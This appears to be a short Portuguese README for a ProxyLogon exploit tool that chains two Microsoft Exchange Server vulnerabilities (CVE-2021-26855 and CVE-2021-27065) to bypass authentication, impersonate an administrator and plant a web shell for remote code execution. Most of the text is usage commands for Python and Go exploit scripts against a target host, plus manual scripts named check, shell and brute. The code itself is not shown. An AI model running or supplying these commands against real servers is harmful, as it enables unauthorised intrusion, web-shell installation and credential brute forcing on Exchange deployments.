
ProxyLogon (CVE-2021-26855+CVE-2021-27065) RCE no Exchange Server (SSRF->GetWebShell)
ProxyLogon é o nome genericamente formal para CVE-2021-26855, uma vulnerabilidade no Microsoft Exchange Server que permite a um invasor contornar a autenticação e se passar por administrador. Também encadeamos esse bug com outra vulnerabilidade pós-autenticação de escrita arbitrária de arquivos, CVE-2021-27065, para obter execução de código.
usage:
sudo python3 proxylogon.py --host=target.com [email protected]
sudo python3 proxylogon.py --host=target.com --mails=./mails.txt
usage:
go run proxylogon.go -u target.com -e [email protected]
sudo python2 /manual/check.py
sudo python2 /manual/shell.py
sudo python2 /manual/brute.py